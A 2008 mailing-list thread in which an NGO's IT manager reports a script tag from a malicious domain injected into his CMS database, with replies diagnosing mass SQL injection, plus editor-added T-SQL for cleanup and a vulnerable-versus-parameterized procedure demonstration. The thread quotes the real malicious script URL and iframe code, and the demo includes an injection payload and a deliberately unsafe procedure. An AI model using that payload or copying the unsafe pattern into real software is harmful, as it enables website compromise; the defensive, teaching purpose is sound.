Mysterious JavaScript appearance in website database


Mysterious JavaScript appearance in website database

by Glenn Gillis


On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
U.S.-based NGO I work for mysteriously had a JavaScript URL appended to
the titles of much of the content on our website:

   <script src=http://www.nihaorr1.com/1.js></script>

NB: the last modified dates for all of the content containing a
reference to this script are identical, right down to the 1/100 second.

The contents of the script apparently attempt to open an iframe to a
non-existent domain, "nmidahena.com":

   document.writeln("<iframe width=\'10\' height=\'1\'
src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");

I haven't found any reports of a new worm, etc. that might account for
this, but when I Google "nmidahena.com" I get over 100,000 hits for
other sites on which this script is present.

We are running a custom-developed CMS with MS-SQL Server 2000 as the
backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT
Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes
released prior to NT4's end-of-life declaration by MS, for what it's worth.)

Anyone have an idea what might have caused this?
--
Thanks,

Glenn Gillis
ELAW U.S. Information Technology Manager
Environmental Law Alliance Worldwide
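The script below is an added example from the editor, not something Glenn or anyone else in the thread posted. It is T-SQL written for SQL Server 2000, the version named in the post, and shows how to find every character column that carries the injected string and how to strip it again, as a dry run first. It assumes nothing about the CMS schema: table and column names are read from the catalog at run time, and the only value taken from the post is the marker string itself.

```sql
-- Added example (not from the thread): locate and remove an injected
-- <script> tag from every char/varchar column in a SQL Server 2000 database.
SET NOCOUNT ON

-- The exact string the post reports being appended to content titles.
DECLARE @marker nvarchar(200)
SET @marker = N'<script src=http://www.nihaorr1.com/1.js></script>'

DECLARE @tbl sysname
DECLARE @col sysname
DECLARE @sql nvarchar(4000)
DECLARE @n   int

-- Report table: which columns carry the marker, and in how many rows.
CREATE TABLE #hits (tbl sysname, col sysname, rows_hit int)

-- SQL Server 2000 has no sys.tables/sys.columns; use the legacy catalog.
-- Only character columns are scanned: REPLACE() does not accept text/ntext
-- in SQL 2000, so those columns need a separate UPDATETEXT pass.
DECLARE cols CURSOR LOCAL FAST_FORWARD FOR
    SELECT o.name, c.name
    FROM   sysobjects o
    JOIN   syscolumns c ON c.id = o.id
    JOIN   systypes   t ON t.xusertype = c.xusertype
    WHERE  o.xtype = 'U'
    AND    t.name IN ('char', 'nchar', 'varchar', 'nvarchar')

OPEN cols
FETCH NEXT FROM cols INTO @tbl, @col
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Identifiers are spliced in through QUOTENAME; the marker travels as a
    -- parameter, so the scan itself is not an injection point.
    SET @sql = N'INSERT #hits SELECT ' + QUOTENAME(@tbl, '''') + N', '
             + QUOTENAME(@col, '''') + N', COUNT(*) FROM ' + QUOTENAME(@tbl)
             + N' WHERE CHARINDEX(@m, ' + QUOTENAME(@col) + N') > 0'
    EXEC sp_executesql @sql, N'@m nvarchar(200)', @m = @marker
    FETCH NEXT FROM cols INTO @tbl, @col
END
CLOSE cols
DEALLOCATE cols

SELECT tbl, col, rows_hit FROM #hits WHERE rows_hit > 0 ORDER BY rows_hit DESC

-- Cleanup pass as a dry run: strip the marker, print per-column counts,
-- then roll back. Change ROLLBACK to COMMIT once the counts match the report.
BEGIN TRAN
DECLARE hits CURSOR LOCAL FAST_FORWARD FOR
    SELECT tbl, col FROM #hits WHERE rows_hit > 0
OPEN hits
FETCH NEXT FROM hits INTO @tbl, @col
WHILE @@FETCH_STATUS = 0
BEGIN
    -- @@ROWCOUNT is captured inside the dynamic batch and returned via OUTPUT.
    SET @sql = N'UPDATE ' + QUOTENAME(@tbl)
             + N' SET ' + QUOTENAME(@col) + N' = REPLACE(' + QUOTENAME(@col) + N', @m, N'''')'
             + N' WHERE CHARINDEX(@m, ' + QUOTENAME(@col) + N') > 0;'
             + N' SET @n = @@ROWCOUNT'
    EXEC sp_executesql @sql, N'@m nvarchar(200), @n int OUTPUT', @m = @marker, @n = @n OUTPUT
    PRINT QUOTENAME(@tbl) + N'.' + QUOTENAME(@col) + N': ' + CAST(@n AS nvarchar(10)) + N' rows cleaned'
    FETCH NEXT FROM hits INTO @tbl, @col
END
CLOSE hits
DEALLOCATE hits
ROLLBACK TRAN   -- dry run; replace with COMMIT TRAN once verified

DROP TABLE #hits
```

Run the report half against a restored copy or a read-only window before touching production. The automated attacks of this kind did not stop at titles; they updated whatever character columns the web application's login could write to, so expect hits in tables that never appear on the rendered site. Cleaning the data does not close the hole: the injection vector in the CMS has to be fixed first, or the next sweep re-populates the same columns.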


Re: Mysterious JavaScript appearance in website database

by Jon Oberheide


Looks like an SQL injection attack.

Take a look in your MS-SQL database at the affected entries and I bet
you'll see the nmidahena reference.

Since this is a widespread, automated attack that has affected other
sites, it's unlikely it was targeted at your specific organization or
custom CMS.  Give your codebase a thorough audit for SQL injection
vectors.

Regards,
Jon Oberheide

On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:

> On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
> U.S.-based NGO I work for mysteriously had a JavaScript URL appended to
> the titles of much of the content on our website:
>
>    <script src=http://www.nihaorr1.com/1.js></script>
>
> NB: the last modified dates for all of the content containing a
> reference to this script are identical, right down to the 1/100 second.
>
> The contents of the script apparently attempt to open an iframe to a
> non-existent domain, "nmidahena.com":
>
>    document.writeln("<iframe width=\'10\' height=\'1\'
> src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");
>
> I haven't found any reports of a new worm, etc. that might account for
> this, but when I Google "nmidahena.com" I get over 100,000 hits for
> other sites on which this script is present.
>
> We are running a custom-developed CMS with MS-SQL Server 2000 as the
> backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT
> Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes
> released prior to NT4's end-of-life declaration by MS, for what it's worth.)
>
> Anyone have an idea what might have caused this?
--
Jon Oberheide <jon@...>
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6  F184 5842 1C89 F47C 17FE


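To go with Jon's advice to audit the codebase for injection vectors, here is the defect and its fix side by side in T-SQL. This is an added example from the editor, not code from the thread or from the CMS under discussion; the Content table, both procedures and the payload's script URL are hypothetical stand-ins.

```sql
-- Added example (not from the thread): string-built SQL beside its
-- parameterized replacement, on a hypothetical CMS table.
CREATE TABLE Content (
    Id    int IDENTITY(1,1) PRIMARY KEY,
    Title nvarchar(200) NOT NULL,
    Body  nvarchar(4000) NULL
)
INSERT Content (Title, Body) VALUES (N'About ELAW', N'Placeholder body text.')
INSERT Content (Title, Body) VALUES (N'Contact',    N'Placeholder body text.')
GO

-- VULNERABLE: the caller's value is concatenated into the statement text, so a
-- quote in the input ends the literal and whatever follows executes as SQL.
-- The defect is the same whether the concatenation happens in a procedure like
-- this one or in the ASP/ADO code that builds the query string.
CREATE PROC GetContentByTitle_Unsafe @title nvarchar(200) AS
    EXEC (N'SELECT Id, Title, Body FROM Content WHERE Title = ''' + @title + N'''')
GO

-- Shape of the input the mass attacks relied on: close the literal, append a
-- statement that rewrites every row, comment out the trailing quote.
-- example.invalid is a placeholder, not a live host.
DECLARE @payload nvarchar(200)
SET @payload = N'x''; UPDATE Content SET Title = Title + ''<script src=http://example.invalid/1.js></script>''--'
EXEC GetContentByTitle_Unsafe @payload
SELECT Title FROM Content      -- every title now ends in the <script> tag
GO

-- HARDENED: sp_executesql ships the statement and the value separately, so the
-- input is only ever compared as a title and cannot alter the statement. (A
-- query this simple should not be dynamic at all; the pattern matters where
-- dynamic SQL is unavoidable.)
CREATE PROC GetContentByTitle @title nvarchar(200) AS
    EXEC sp_executesql
        N'SELECT Id, Title, Body FROM Content WHERE Title = @t',
        N'@t nvarchar(200)',
        @t = @title
GO

-- Same payload against the hardened procedure: zero rows back, no UPDATE runs.
DECLARE @payload nvarchar(200)
SET @payload = N'x''; UPDATE Content SET Title = Title + ''<script src=http://example.invalid/1.js></script>''--'
EXEC GetContentByTitle @payload
SELECT Title FROM Content      -- unchanged from the previous SELECT
GO
```

Two further checks belong in the same audit. First, the application-layer equivalent: in classic ASP every query built by concatenating `Request` values into a string is the unsafe procedure above, and the fix is an ADODB.Command with parameters. Second, the database login the site uses: an UPDATE that touches every table only succeeds because that login is allowed to write to every table. Restricting the web login to the procedures and tables the CMS actually needs does not prevent the injection, but it caps what a successful one can change.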

Re: Mysterious JavaScript appearance in website database

by Bob Cunningham


On Apr 14, 2008, at 1:03 PM, Glenn Gillis wrote:
> The contents of the script apparently attempt to open an iframe to a
> non-existent domain, "nmidahena.com"

See:

        http://isc.sans.org/diary.html?storyid=4240
        http://isc.sans.org/diary.html?storyid=4144
        http://www.finjan.com/MCRCblog.aspx?EntryId=1905


Re: Mysterious JavaScript appearance in website database

by Bojan Zdrnja


Glenn,

On Tue, Apr 15, 2008 at 1:03 AM, Glenn Gillis
<glenn@...> wrote:

> On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
>  U.S.-based NGO I work for mysteriously had a JavaScript URL appended to the
> titles of much of the content on our website:
>
>   <script src=http://www.nihaorr1.com/1.js></script>
>
>  NB: the last modified dates for all of the content containing a reference
> to this script are identical, right down to the 1/100 second.
>
>  The contents of the script apparently attempt to open an iframe to a
>  non-existent domain, "nmidahena.com":
>
>   document.writeln("<iframe width=\'10\' height=\'1\'
>  src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");
>
>  I haven't found any reports of a new worm, etc. that might account for
> this, but when I Google "nmidahena.com" I get over 100,000 hits for
>  other sites on which this script is present.
>
>  We are running a custom-developed CMS with MS-SQL Server 2000 as the
> backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT
> Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes
> released prior to NT4's end-of-life declaration by MS, for what it's worth.)
>
>  Anyone have an idea what might have caused this?

It's almost certainly an SQL injection attack that inserted the line
of code above to all your HTML pages. These have become very common
lately.

I wrote a diary describing such an attack at
http://isc.sans.org/diary.html?storyid=3823

Cheers,

Bojan

--
Bojan Zdrnja, B.Sc.
CISSP/GCIA/GCIH
Senior Information Security Consultant

Infigo IS
http://www.infigo.hr

Re: Mysterious JavaScript appearance in website database

by stremovsky


I can advise you to update your CMS system, including all plugins, and
install an SQL firewall.
You can use the GreenSQL db firewall to protect a MySQL server from SQL
injection attacks.

http://www.greensql.net/

Best regards,
Yuli


On Tue, Apr 15, 2008 at 2:53 AM, Jon Oberheide <jon@...> wrote:

> Looks like an SQL injection attack.
>
> Take a look in your MS-SQL database at the affected entries and I bet
> you'll see the nmidahena reference.
>
> Since this is a widespread, automated attack that has affected other
> sites, it's unlikely it was targeted at your specific organization or
> custom CMS.  Give your codebase a thorough audit for SQL injection
> vectors.
>
> Regards,
> Jon Oberheide
>
>
>
>
> On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:
> > On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
> > U.S.-based NGO I work for mysteriously had a JavaScript URL appended to
> > the titles of much of the content on our website:
> >
> >    <script src=http://www.nihaorr1.com/1.js></script>
> >
> > NB: the last modified dates for all of the content containing a
> > reference to this script are identical, right down to the 1/100 second.
> >
> > The contents of the script apparently attempt to open an iframe to a
> > non-existent domain, "nmidahena.com":
> >
> >    document.writeln("<iframe width=\'10\' height=\'1\'
> > src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");
> >
> > I haven't found any reports of a new worm, etc. that might account for
> > this, but when I Google "nmidahena.com" I get over 100,000 hits for
> > other sites on which this script is present.
> >
> > We are running a custom-developed CMS with MS-SQL Server 2000 as the
> > backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT
> > Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes
> > released prior to NT4's end-of-life declaration by MS, for what it's worth.)
> >
> > Anyone have an idea what might have caused this?
> --
> Jon Oberheide <jon@...>
> GnuPG Key: 1024D/F47C17FE
> Fingerprint: B716 DA66 8173 6EDD 28F6  F184 5842 1C89 F47C 17FE
>



--
http://www.kyplex.com/

Re: Mysterious JavaScript appearance in website database

by Glenn Gillis


Bojan Zdrnja wrote, On 4/15/2008 12:26 AM:

> Glenn,
>
> It's almost certainly an SQL injection attack that inserted the line
> of code above to all your HTML pages. These have become very common
> lately.
>
> I wrote a diary describing such an attack at
> http://isc.sans.org/diary.html?storyid=3823
>
> Cheers,
>
> Bojan

Thanks, everyone, for your informative replies. I feel a little sheepish
for not having heard of the Midhena virus prior to this, but as many
of you pointed out, that seems to have been what got us.

I wish I could update our CMS (if the vendor still supported it, instead
of having moved on to deploying Plone sites!) I do believe I know the
entry point of the SQL injection, however, and have a good backup of the
database from just prior to the attack to roll back to.

Thanks again!
--
Glenn Gillis
ELAW U.S. Information Technology Manager
Environmental Law Alliance Worldwide

P.S. Sorry for tripping everyone's email anti-virus software by
enclosing the text of the .js file in my post! G.